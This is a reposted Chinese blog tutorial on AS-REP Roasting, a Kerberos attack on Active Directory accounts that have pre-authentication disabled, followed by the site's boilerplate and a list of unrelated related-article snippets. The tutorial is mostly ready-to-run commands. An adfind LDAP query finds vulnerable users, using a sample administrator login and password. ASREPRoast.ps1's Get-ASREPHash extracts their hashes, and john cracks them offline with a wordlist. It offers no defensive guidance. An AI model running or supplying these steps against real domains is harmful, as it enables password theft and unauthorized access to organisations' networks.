AS-REP Roasting离线爆破攻击

针对一个域内用户,其账户选项有个设置叫作 “不要求 kerberos 预身份验证”,它默认是关闭的。

当 “不要求 kerberos 预身份验证” 选项被勾选,会出现以下效果:

  • as-req 报文中不需要添加用户 hash 加密的时间戳,自动返回 as-rep 报文。

  • 如果用户能使用用户 hash 解密 as-rep 报文中的 Logon Session Key ,那么代表用户凭据正确。

as-req Roasting攻击的原理就是当我们收到 as-rep 报文后,我们使用密码字典生成多个 hash 来解密 Logon Session Key ,如果成功则爆破出密码。

查询 “不要求 kerberos 预身份验证” 的域用户

工具:adfind

在域外:
adfind -h [dc_ip:dc_port] -u [domain_name\user_name] -up [password] -f "useraccountcontrol:1.2.840.113556.1.4.803:=4194304" -dn
​
[dc_ip:dc_port]:表示域控ip和端口号
[username\domain_name]:表示用户及所在的域
[password]:表示用户的密码
-f:过滤条件为useraccountcontrol:1.2.840.113556.1.4.803:=4194304
-dn:表示显示结果属性为dn
AdFind -h 192.168.72.163:389 -u hacker.com\administrator -up p-0p-0p-0p -f "useraccountcontrol:1.2.840.113556.1.4.803:=4194304" -dn

向 “不要求 kerberos 预身份验证” 的域用户发起 as-req 请求

工具:ASREPRoast.ps1,项目地址:ASREPRoast/ASREPRoast.ps1 at master · HarmJ0y/ASREPRoast · GitHub

Import-Module .\ASREPRoast.ps1 
Get-ASREPHash -UserName [username] -Domain [domain_name] -Server [dc_ip] | Out-File -Encoding ASCII hash.txt
Import-Module .\ASREPRoast.ps1 
Get-ASREPHash -UserName administrator -Domain hacker.com -Server 192.168.72.163 | Out-File -Encoding ASCII hash.txt

离线爆破

工具:john

john --wordlist=[passwords_file] hash.txt
john --wordlist=/tmp/password.txt /tmp/hash.txt

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/890278.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

JMeter配置原件-计数器

JMeter配置原件-计数器

一、面临的问题: 由于本人的【函数助手对话框】中counter计数器每次加2,且只显示偶数(如下图所示),因此借助【配置原件-计数器】来实现计数功能。 如果有大佬知道解决方式,麻烦评论区解答一下,谢谢。 二、配置原件-c…
阅读更多...
基于“2+1 链动模式商城小程序”的微商服务营销策略探究

基于“2+1 链动模式商城小程序”的微商服务营销策略探究

摘要:本文探讨在竞争激烈的市场经济与移动互联网时代背景下,微商面临的机遇与挑战。着重分析“21 链动模式商城小程序”如何助力微商改变思路,通过重视服务、提升服务质量,以服务营销放大利润,实现从传统微商模式向更具…
阅读更多...
Grad-CAM-解释CNN决策过程的可视化技术

Grad-CAM-解释CNN决策过程的可视化技术

Grad-CAM(Gradient-weighted Class Activation Mapping)是一种用于解释卷积神经网络(CNN)决策过程的可视化技术。其核心思想是通过计算分类分数相对于网络确定的卷积特征的梯度,来识别图像中哪些部分对分类结果最为重要…
阅读更多...
文件防泄漏 | 文件防泄漏软件解决方案分享,网络数据泄露防护系统

文件防泄漏 | 文件防泄漏软件解决方案分享,网络数据泄露防护系统

文件防泄漏 | 文件防泄漏软件解决方案分享,网络数据泄露防护系统 企业面临的一大挑战是数据安全和隐私保护。 网络数据泄露不仅会导致经济损失,还会损害企业的声誉和客户关系。 为了应对这一挑战,域智盾软件应运而生,成为众多企…
阅读更多...
EGO Swarm翻译

EGO Swarm翻译

目录 摘要 Ⅰ 介绍 Ⅱ 相关工作 A . 单四旋翼局部规划 B . 拓扑规划 C. 分布式无人机集群 Ⅲ 基于梯度的局部规划隐式拓扑轨迹生成 A.无需ESDF梯度的局部路径规划 B.隐式拓扑轨迹生成 Ⅳ 无人机集群导航 A 机间避碰 B. 定位漂移补偿 C. 从深度图像中去除agent Ⅴ …
阅读更多...
直流充电桩基本工作原理

直流充电桩基本工作原理

1、控制导引电路 2、电动汽车直流快充工作原理 1)第一阶段 未充电自然状态阶段 充电枪处于自然阶段,充电枪上的按钮没有按下,也就是电路图中的开关S处于接通状态,此时R1 、 R2串联,检测点1处的电压为6V 2)…
阅读更多...
七、网络安全-企业数据脱敏

七、网络安全-企业数据脱敏

文章目录 前言一、数据脱敏方法二、企业脱敏方案1. 数据库脱敏方案2. 历史数据脱敏3. 具体实现 三、日志脱敏方案四、输出脱敏 前言 数据脱敏‌ 随着用户对个人隐私数据的重视和法律法规的完善,数据安全显得愈发重要。一方面可以加强权限管理,减少能够接…
阅读更多...
任务2 配置防火墙firewalld

任务2 配置防火墙firewalld

基本概念 概述 支持动态更新防火墙规则 不重启即可创建、修改和删除规则 使用区域和服务来简化防火墙配置 区域 一组预定义的规则,防火墙策略集合(或策略模板) 把网络分配到不同的区域中,并为网络及其关联的网络接口或流量源…
阅读更多...
HIPT论文阅读

HIPT论文阅读

题目《Scaling Vision Transformers to Gigapixel Images via Hierarchical Self-Supervised Learning》 论文地址:[2206.02647] Scaling Vision Transformers to Gigapixel Images via Hierarchical Self-Supervised Learning 项目地址:mahmoodlab/HI…
阅读更多...
重拾设计模式--状态模式

重拾设计模式--状态模式

文章目录 状态模式(State Pattern)概述状态模式UML图作用:状态模式的结构环境(Context)类:抽象状态(State)类:具体状态(Concrete State)类&#x…
阅读更多...
[WiFi] WiFi 802.1x介绍及EAP认证流程整理

[WiFi] WiFi 802.1x介绍及EAP认证流程整理

802.1X Wi-Fi 802.1X 是一种网络访问控制协议,常用于保护无线网络。它提供了一种基于端口的网络访问控制机制,主要用于在用户和网络之间建立安全的连接。以下是 802.1X 的一些关键特点: 认证框架 802.1X 使用 EAP(可扩展认证协议…
阅读更多...
服务器数据恢复—V7000存储中多块磁盘出现故障导致业务中断的数据恢复案例

服务器数据恢复—V7000存储中多块磁盘出现故障导致业务中断的数据恢复案例

服务器存储数据恢复环境: 一台V7000存储上共12块SAS机械硬盘(其中1块是热备盘),组建了2组Mdisk,创建了一个pool。挂载在小型机上作为逻辑盘使用,小型机上安装的AIXSybase。 服务器存储故障: V7…
阅读更多...
网络安全防范

网络安全防范

实践内容 学习总结 PDR,$$P^2$$DR安全模型。 防火墙(Firewall): 网络访问控制机制,布置在网际间通信的唯一通道上。 不足:无法防护内部威胁,无法阻止非网络传播形式的病毒,安全策略…
阅读更多...
你的第一个博客-第一弹

你的第一个博客-第一弹

使用 Flask 开发博客 Flask 是一个轻量级的 Web 框架,适合小型应用和学习项目。我们将通过 Flask 开发一个简单的博客系统,支持用户注册、登录、发布文章等功能。 步骤: 安装 Flask 和其他必要库: 在开发博客之前,首…
阅读更多...
LLaMA-Factory(一)环境配置及包下载

LLaMA-Factory(一)环境配置及包下载

LLaMA-Factory(一)环境配置及包下载 本机配置1. git下载2.创建虚拟环境3. 下载官方包内依赖4. 下载bitsandbytes5. 启动项目6. 可能出现问题1:pip install 出现 error: subprocess-exited-with-error 错误7. 可能出现问题2: ModuleNotFoundEr…
阅读更多...
clickhouse-题库

clickhouse-题库

1、clickhouse介绍以及架构 clickhouse一个分布式列式存储数据库,主要用于在线分析查询 2、列式存储和行式存储有什么区别? 行式存储: 1)、数据是按行存储的 2)、没有建立索引的查询消耗很大的IO 3)、建…
阅读更多...
计算机网络:运输层 —— TCP 的选择确认(SACK)

计算机网络:运输层 —— TCP 的选择确认(SACK)

文章目录 TCP 的选择确认协商与启用工作机制接收方发送方 TCP 的选择确认 在 TCP 传输过程中,由于网络拥塞、链路故障等因素,数据可能会出现丢失或乱序的情况。传统的 TCP 确认机制是累积确认,TCP 接收方只能对按序收到的数据中的最高序号给…
阅读更多...
HTML语法规范

HTML语法规范

HTML语法规则 HTML 标签是由尖括号包围的关键词&#xff0c;标签通常是成对出现的&#xff0c;例如 <html> 和 </html>&#xff0c;称为双标签 。标签对中的第一个标签是开始标签&#xff0c;第二个标签是结束标签单标签比较少&#xff0c;例如<br />&#x…
阅读更多...
STL 剖析

STL 剖析

STL 六大组件 「STL 六大组件的交互关系」 Container 通过 Allocator 取得数据储存空间Algorithm 通过 Iterator 存取 Container 内容Functor 可以协助 Algorithm 完成不同的策略变化Adapter 可以修饰或套接 Functor、Iterator 配置器(allocator) 配置器&#xff1a;负责空间…
阅读更多...
Y3编辑器教程8:资源管理器与存档、防作弊设置

Y3编辑器教程8:资源管理器与存档、防作弊设置

文章目录 一、资源管理器简介1.1 界面介绍1.2 资源商店1.3 AI专区1.3.1 AI文生图1.3.2 AI图生图1.3.3 立绘头像 二、导入导出2.1 文件格式2.2 模型导入2.2.1 模型制作后导出2.2.2 模型文件导入Y3编辑器2.2.3 Y3编辑器角色、装饰物模型要求 2.3 纹理导入2.4 材质贴图2.4.1 材质支…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023